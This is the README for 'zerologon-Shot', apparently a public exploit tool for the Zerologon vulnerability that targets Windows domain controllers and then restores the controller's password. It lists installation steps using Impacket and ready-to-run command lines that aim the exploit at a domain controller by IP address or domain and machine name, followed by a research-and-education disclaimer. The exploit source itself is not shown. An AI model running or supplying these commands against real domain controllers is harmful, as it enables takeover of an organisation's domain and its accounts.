Home

Awesome

<a name="readme-top"></a>

zerologon-Shot

Zerologon exploit with restore DC password automatically

Table of Contents

<ol> <li> <a href="#getting-started">Getting Started</a> <ul> <li><a href="#installation">Installation</a></li> </ul> </li> <li><a href="#usage">Usage</a></li> <li><a href="#screenshots">Screenshots</a></li> <li><a href="#how-it-works">How it works?</a></li> <li><a href="#disclaimer">Disclaimer</a></li> <li><a href="#references">References</a></li> </ol>

Getting Started

Installation

Only need latest version of Impacket

  1. Clone the impacket repository
    git clone https://github.com/fortra/impacket
    
  2. Install imapcket
    cd imapcket && sudo pip3 install .
    
  3. Enjoy it :)
    git clone https://github.com/XiaoliChan/zerologon-Shot.git
    
<p align="right">(<a href="#readme-top">back to top</a>)</p>

Usage

python3 zerologon-Shot.py ip_addr

or

python3 zerologon-Shot.py domain/'dc_name$'@ip_addr

E.g.
python3 zerologon-Shot.py 192.168.85.210
python3 zerologon-Shot.py xiaoli-2008.com/'WIN-D6SJTQG7I0K$'@192.168.85.210
python3 zerologon-Shot.py xiaoli-2008.com/'WIN-D6SJTQG7I0K$'@192.168.85.210 -dc-ip 192.168.85.210
<p align="right">(<a href="#readme-top">back to top</a>)</p>

Screenshots

image

image

image

<p align="right">(<a href="#readme-top">back to top</a>)</p>

How it works?

<p align="right">(<a href="#readme-top">back to top</a>)</p>

Disclaimer

The spirit of this Open Source initiative is to help security researchers, and the community, speed up research and educational activities related to the implementation of networking protocols and stacks.

The information in this repository is for research and educational purposes and not meant to be used in production environments and/or as part of commercial products.

If you desire to use this code or some part of it for your own uses, we recommend applying proper security development life cycle and secure coding practices, as well as generate and track the respective indicators of compromise according to your needs.

<p align="right">(<a href="#readme-top">back to top</a>)</p>

References

<p align="right">(<a href="#readme-top">back to top</a>)</p>